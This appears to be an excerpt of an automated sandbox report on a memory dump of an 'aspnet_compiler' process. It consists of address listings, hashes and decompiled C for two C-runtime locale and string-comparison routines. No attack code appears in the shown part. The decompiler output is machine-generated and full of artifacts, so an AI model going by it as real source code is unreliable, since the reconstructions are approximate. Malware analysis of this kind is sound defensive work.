                    0x0044b994
                    0x0044b999
                    0x0044b999
                    0x0044b9a1
                    0x0044b9a7
                    0x0044b9a7
                    0x00000000
                    0x0044b9a7
                    0x0044b632
                    0x0044b638
                    0x00000000
                    0x00000000
                    0x0044b640
                    0x0044b64c
                    0x0044b64f
                    0x0044b652
                    0x0044b655
                    0x0044b65c
                    0x0044b65f
                    0x0044b663
                    0x0044b666
                    0x0044b669
                    0x00000000
                    0x00000000
                    0x0044b66f
                    0x0044b672
                    0x0044b678
                    0x0044b692
                    0x0044b694
                    0x0044b990
                    0x00000000
                    0x0044b990
                    0x0044b69a
                    0x0044b69e
                    0x00000000
                    0x00000000
                    0x0044b6a4
                    0x0044b6a8
                    0x00000000
                    0x00000000
                    0x0044b6af
                    0x0044b6b3
                    0x0044b6b6
                    0x0044b6b9
                    0x0044b6be
                    0x0044b6be
                    0x0044b6c1
                    0x0044b6de
                    0x0044b6e3
                    0x0044b6e5
                    0x0044b6e7
                    0x0044b707
                    0x0044b708
                    0x0044b70a
                    0x0044b70d
                    0x0044b70f
                    0x0044b711
                    0x0044b713
                    0x0044b713
                    0x0044b71e
                    0x0044b720
                    0x0044b727
                    0x0044b72c
                    0x0044b72f
                    0x0044b732
                    0x0044b734
                    0x0044b759
                    0x0044b75e
                    0x0044b765
                    0x0044b768
                    0x0044b76b
                    0x0044b76f
                    0x0044b771
                    0x0044b775
                    0x0044b777
                    0x0044b77a
                    0x0044b77d
                    0x0044b77f
                    0x0044b782
                    0x0044b789
                    0x0044b78c
                    0x0044b791
                    0x0044b794
                    0x0044b79d
                    0x0044b7a1
                    0x0044b7a4
                    0x0044b7a7
                    0x0044b7aa
                    0x0044b7b0
                    0x0044b7b2
                    0x0044b7bb
                    0x0044b7be
                    0x0044b7c1
                    0x0044b7c4
                    0x0044b7c5
                    0x0044b7c9
                    0x0044b7cf
                    0x0044b7d9
                    0x0044b7de
                    0x0044b7ee
                    0x0044b7f2
                    0x0044b7f5
                    0x0044b7f7
                    0x0044b7f9
                    0x0044b7fb
                    0x0044b7fd
                    0x0044b805
                    0x0044b806
                    0x0044b809
                    0x0044b80c
                    0x0044b80d
                    0x0044b813
                    0x0044b81d
                    0x0044b825
                    0x0044b828
                    0x0044b834
                    0x0044b838
                    0x0044b83b
                    0x0044b83d
                    0x0044b83f
                    0x0044b841
                    0x0044b843
                    0x0044b84b
                    0x0044b84c
                    0x0044b84f
                    0x0044b852
                    0x0044b852
                    0x0044b853
                    0x0044b859
                    0x0044b863
                    0x0044b863
                    0x0044b841
                    0x0044b83d
                    0x0044b828
                    0x0044b7fb
                    0x0044b7f7
                    0x0044b7de
                    0x0044b7b2
                    0x0044b7aa
                    0x0044b869
                    0x0044b86f
                    0x0044b871
                    0x0044b8e4
                    0x0044b8e4
                    0x0044b8e8
                    0x0044b8f8
                    0x0044b8fe
                    0x0044b900
                    0x0044b95c
                    0x0044b95c
                    0x0044b964
                    0x0044b965
                    0x0044b967
                    0x0044b980
                    0x0044b983
                    0x0044b8c0
                    0x0044b8c1
                    0x00000000
                    0x0044b8c6
                    0x0044b989
                    0x00000000
                    0x0044b989
                    0x0044b96e
                    0x0044b979
                    0x00000000
                    0x0044b979
                    0x0044b902
                    0x0044b905
                    0x0044b908
                    0x00000000
                    0x00000000
                    0x0044b90a
                    0x0044b90a
                    0x0044b90d
                    0x0044b910
                    0x0044b913
                    0x0044b91a
                    0x0044b91f
                    0x0044b921
                    0x0044b925
                    0x0044b940
                    0x0044b944
                    0x0044b945
                    0x0044b948
                    0x0044b949
                    0x0044b955
                    0x0044b94b
                    0x0044b94b
                    0x0044b94b
                    0x0044b927
                    0x0044b927
                    0x0044b927
                    0x0044b932
                    0x0044b937
                    0x0044b93a
                    0x0044b93a
                    0x00000000
                    0x0044b91f
                    0x0044b876
                    0x0044b879
                    0x0044b880
                    0x0044b885
                    0x00000000
                    0x00000000
                    0x0044b88e
                    0x0044b894
                    0x0044b896
                    0x00000000
                    0x00000000
                    0x0044b898
                    0x0044b89c
                    0x00000000
                    0x00000000
                    0x0044b8b0
                    0x0044b8b6
                    0x0044b8b8
                    0x0044b8dc
                    0x0044b8df
                    0x00000000
                    0x0044b8df
                    0x0044b8ba
                    0x00000000
                    0x0044b736
                    0x0044b73b
                    0x0044b746
                    0x0044b8c7
                    0x0044b8c7
                    0x0044b8c7
                    0x0044b8ca
                    0x0044b8cb
                    0x00000000
                    0x0044b8d3
                    0x0044b734
                    0x0044b6e9
                    0x0044b6ee
                    0x0044b6f5
                    0x0044b6fb
                    0x00000000
                    0x0044b6fb
                    0x0044b6c3
                    0x0044b6c6
                    0x0044b6d0
                    0x0044b6d0
                    0x0044b6d3
                    0x0044b6d6
                    0x00000000
                    0x0044b6d6
                    0x0044b6ca
                    0x0044b6cc
                    0x0044b6ce
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044b6ce
                    0x0044b67a
                    0x0044b67f
                    0x0044b687
                    0x00000000
                    0x0044b612
                    0x0044b617
                    0x0044b61a
                    0x0044b61f
                    0x0044b9ac
                    0x00000000
                    0x0044b9ac

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 56c92366c9c142871bd2cfac74ae2ca5b0ffb3cedc8e660afd08c35565e41f2e
                    • Instruction ID: bf7309e27d7813377405dfc29e16a9701e648260f6ca06a135f05bfcd2001108
                    • Opcode Fuzzy Hash: 56c92366c9c142871bd2cfac74ae2ca5b0ffb3cedc8e660afd08c35565e41f2e
                    • Instruction Fuzzy Hash: D2C108B0D04249AFEF11DFA9C841BAE7BB4EF09304F14409AE514A7392C778D941CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00452603 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			E00452603(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46f00c; // 0x54ba778e
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E00444FE6(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E00444FE6(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E00444A38(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00455A90();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E00444A38(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00455A90();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E00446EAF(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00434713(_t130);
													}
												}
											}
										}
									}
								}
								E00434713(_t100);
							}
						}
					}
				}
				L63:
				return E004338BB(_v8 ^ _t132);
			}






































                    0x0045260b
                    0x00452612
                    0x0045261a
                    0x0045261d
                    0x00452623
                    0x00452626
                    0x00452629
                    0x0045262d
                    0x00452630
                    0x00452635
                    0x0045265c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00452637
                    0x0045263f
                    0x00452641
                    0x00452645
                    0x00452645
                    0x0045264a
                    0x00452668
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0045264c
                    0x00452655
                    0x0045266a
                    0x0045266a
                    0x0045266f
                    0x00452676
                    0x00452679
                    0x00452679
                    0x0045267e
                    0x0045268a
                    0x00452697
                    0x004526a4
                    0x004526b7
                    0x00000000
                    0x004526b9
                    0x004526bb
                    0x004526ee
                    0x00000000
                    0x004526f0
                    0x004526f2
                    0x004526f6
                    0x004526fc
                    0x004526ff
                    0x00452701
                    0x00452704
                    0x00452704
                    0x00452709
                    0x00000000
                    0x00000000
                    0x0045270b
                    0x0045270f
                    0x00452719
                    0x0045271e
                    0x00000000
                    0x00452720
                    0x00000000
                    0x00452720
                    0x0045271e
                    0x00000000
                    0x0045270f
                    0x00452704
                    0x004526ff
                    0x00000000
                    0x004526f6
                    0x004526bd
                    0x004526bf
                    0x004526c3
                    0x004526c9
                    0x004526cc
                    0x004526ce
                    0x004526ce
                    0x004526d3
                    0x00000000
                    0x00000000
                    0x004526d5
                    0x004526d9
                    0x004526e3
                    0x004526e8
                    0x00000000
                    0x004526ea
                    0x00000000
                    0x004526ea
                    0x004526e8
                    0x00000000
                    0x004526d9
                    0x004526ce
                    0x004526cc
                    0x00000000
                    0x004526c3
                    0x004526bb
                    0x004526a6
                    0x004526a6
                    0x004526a6
                    0x00000000
                    0x004526a6
                    0x00452699
                    0x00452699
                    0x0045269b
                    0x0045268c
                    0x0045268c
                    0x0045268e
                    0x0045268e
                    0x00452725
                    0x00452725
                    0x00452725
                    0x00452732
                    0x00452738
                    0x0045273d
                    0x0045265e
                    0x00452743
                    0x00452743
                    0x0045274b
                    0x0045274f
                    0x004527aa
                    0x004527ac
                    0x00000000
                    0x00452751
                    0x00452756
                    0x00452758
                    0x0045275a
                    0x00452762
                    0x00452786
                    0x0045278b
                    0x00452790
                    0x00452796
                    0x00000000
                    0x0045279c
                    0x0045279c
                    0x00000000
                    0x0045279c
                    0x00452764
                    0x00452766
                    0x0045276a
                    0x0045276f
                    0x00452771
                    0x00452776
                    0x0045288b
                    0x0045288b
                    0x0045277c
                    0x0045277c
                    0x004527a2
                    0x004527a2
                    0x004527a5
                    0x004527af
                    0x004527b1
                    0x00000000
                    0x004527b7
                    0x004527bf
                    0x004527cd
                    0x00000000
                    0x004527d3
                    0x004527dc
                    0x004527e2
                    0x004527e7
                    0x00000000
                    0x004527ed
                    0x004527ed
                    0x004527f0
                    0x004527f5
                    0x004527f9
                    0x00452845
                    0x00000000
                    0x004527fb
                    0x00452800
                    0x00452802
                    0x00452804
                    0x0045280c
                    0x00452829
                    0x00452833
                    0x00452835
                    0x00452838
                    0x00000000
                    0x0045283a
                    0x0045283a
                    0x00000000
                    0x0045283a
                    0x0045280e
                    0x00452810
                    0x00452814
                    0x00452819
                    0x0045281d
                    0x0045287f
                    0x0045287f
                    0x0045281f
                    0x0045281f
                    0x00452840
                    0x00452840
                    0x00452847
                    0x00452849
                    0x00000000
                    0x00452862
                    0x00452862
                    0x0045287b
                    0x0045287b
                    0x00452849
                    0x0045281d
                    0x0045280c
                    0x00452883
                    0x00452888
                    0x004527e7
                    0x004527cd
                    0x004527b1
                    0x00452776
                    0x00452762
                    0x0045288f
                    0x00452895
                    0x0045273d
                    0x0045267e
                    0x0045264a
                    0x00452897
                    0x004528aa

                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004528DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004526AF
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452732
                    • __alloca_probe_16.LIBCMT ref: 0045276A
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004528DC,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527C5
                    • __alloca_probe_16.LIBCMT ref: 00452814
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527DC
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452858
                    • __freea.LIBCMT ref: 00452883
                    • __freea.LIBCMT ref: 0045288F
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                    • String ID:
                    • API String ID: 201697637-0
                    • Opcode ID: 768b996481d749ff10557c4c7c1c0a01c42c9ac738d115a97dc7b4c5a44c3e6d
                    • Instruction ID: ccc14fa8acdac63bc9519f5215d42201de6c5a87ae6f625bde0ffe2347fa224d
                    • Opcode Fuzzy Hash: 768b996481d749ff10557c4c7c1c0a01c42c9ac738d115a97dc7b4c5a44c3e6d
                    • Instruction Fuzzy Hash: 07911871E002169BDF249EA5C981EEF7BB59F4A311F18062BEC00E7242D779CC498768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00443A7A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E00443A7A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46f00c; // 0x54ba778e
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00446A95(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E004431C4(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E00444A38(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xcea3
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E004463E1(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043A5E8();
									asm("int3");
									_t169 =  *0x470518; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E00442ED1(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E0044F9AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x45b4e8, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004358BA( &_v528,  *0x46f170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x45b428; // 0x40f943
									 *0x4574c8(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46f2a8;
										if(_t228 != 0x46f2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E00445002( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E00445002( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xcea3
												E00445002( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xcea3
										E00445002( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E00445002(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E004338BB(_v8 ^ _t262);
				}
				L47:
			}

























































                    0x00443a7d
                    0x00443a85
                    0x00443a8c
                    0x00443a8f
                    0x00443a90
                    0x00443a93
                    0x00443a97
                    0x00443a98
                    0x00443a9b
                    0x00443aab
                    0x00443ab7
                    0x00443ace
                    0x00443ad3
                    0x00443ad8
                    0x00443aed
                    0x00443af0
                    0x00443af0
                    0x00443af3
                    0x00443af9
                    0x00443b02
                    0x00443b04
                    0x00443b07
                    0x00443b0e
                    0x00443b11
                    0x00443b17
                    0x00000000
                    0x00000000
                    0x00443b19
                    0x00443b1d
                    0x00443b46
                    0x00443b46
                    0x00443b1f
                    0x00443b1f
                    0x00443b23
                    0x00443b27
                    0x00443b2e
                    0x00443b34
                    0x00000000
                    0x00443b36
                    0x00443b36
                    0x00443b39
                    0x00443b3c
                    0x00443b44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00443b44
                    0x00443b34
                    0x00443b53
                    0x00443b53
                    0x00443b55
                    0x00443b5b
                    0x00443b61
                    0x00443b64
                    0x00443b64
                    0x00443b67
                    0x00443b6a
                    0x00443b6a
                    0x00443b7a
                    0x00443b88
                    0x00443b8d
                    0x00443b94
                    0x00443b96
                    0x00000000
                    0x00443b9c
                    0x00443ba2
                    0x00443ba8
                    0x00443baf
                    0x00443bb5
                    0x00443bb8
                    0x00443bbe
                    0x00443bcb
                    0x00443bd2
                    0x00443bd7
                    0x00443bda
                    0x00443bdc
                    0x00443e35
                    0x00443e3b
                    0x00443e3c
                    0x00443e3d
                    0x00443e3e
                    0x00443e3f
                    0x00443e40
                    0x00443e45
                    0x00443e46
                    0x00443e4b
                    0x00443be2
                    0x00443be2
                    0x00443bf0
                    0x00443bf3
                    0x00443c0e
                    0x00443c15
                    0x00443c1b
                    0x00443c21
                    0x00443bf5
                    0x00443bf5
                    0x00443bfd
                    0x00000000
                    0x00443bff
                    0x00443bff
                    0x00443c05
                    0x00443c05
                    0x00443bfd
                    0x00443c28
                    0x00443c2b
                    0x00443d48
                    0x00443d4b
                    0x00443d58
                    0x00443d5b
                    0x00443d63
                    0x00443d63
                    0x00443d4d
                    0x00443d53
                    0x00443d53
                    0x00443c31
                    0x00443c31
                    0x00443c37
                    0x00443c3f
                    0x00443c41
                    0x00443c44
                    0x00443c4d
                    0x00443c56
                    0x00443c5c
                    0x00443c5c
                    0x00443c5f
                    0x00443c61
                    0x00000000
                    0x00000000
                    0x00443c63
                    0x00443c69
                    0x00443c6a
                    0x00443c75
                    0x00443c7d
                    0x00443c85
                    0x00443c88
                    0x00443c8b
                    0x00443c91
                    0x00443c97
                    0x00443c9d
                    0x00443ca3
                    0x00443ca6
                    0x00000000
                    0x00000000
                    0x00443ca8
                    0x00443ccd
                    0x00443ccd
                    0x00443cd0
                    0x00443cd4
                    0x00443ced
                    0x00443cf2
                    0x00443cf5
                    0x00443cf7
                    0x00443cfd
                    0x00443d38
                    0x00443cff
                    0x00443cff
                    0x00443d04
                    0x00443d0c
                    0x00443d0d
                    0x00443d0d
                    0x00443d24
                    0x00443d2b
                    0x00443d2e
                    0x00443d33
                    0x00443d33
                    0x00443d3b
                    0x00443d3e
                    0x00443d3e
                    0x00443d43
                    0x00000000
                    0x00443d43
                    0x00443caa
                    0x00443cac
                    0x00443cb1
                    0x00443cb7
                    0x00443cc0
                    0x00443cc9
                    0x00443cc9
                    0x00000000
                    0x00443cac
                    0x00443d66
                    0x00443d66
                    0x00443d6a
                    0x00443d72
                    0x00443d78
                    0x00443d7b
                    0x00443d81
                    0x00443d83
                    0x00443dc3
                    0x00443dc9
                    0x00443dd0
                    0x00443dd0
                    0x00443dd6
                    0x00443dda
                    0x00000000
                    0x00443ddc
                    0x00443ddc
                    0x00443de0
                    0x00443de5
                    0x00443de9
                    0x00443dee
                    0x00443df5
                    0x00443e03
                    0x00443e09
                    0x00443e0c
                    0x00443e0c
                    0x00443dda
                    0x00443e1b
                    0x00443e23
                    0x00443e2c
                    0x00443d85
                    0x00443d8b
                    0x00443d8e
                    0x00443d95
                    0x00443da7
                    0x00443dae
                    0x00443dbb
                    0x00000000
                    0x00443dbb
                    0x00000000
                    0x00443d83
                    0x00443bdc
                    0x00443b57
                    0x00000000
                    0x00443b57
                    0x00000000
                    0x00443b55
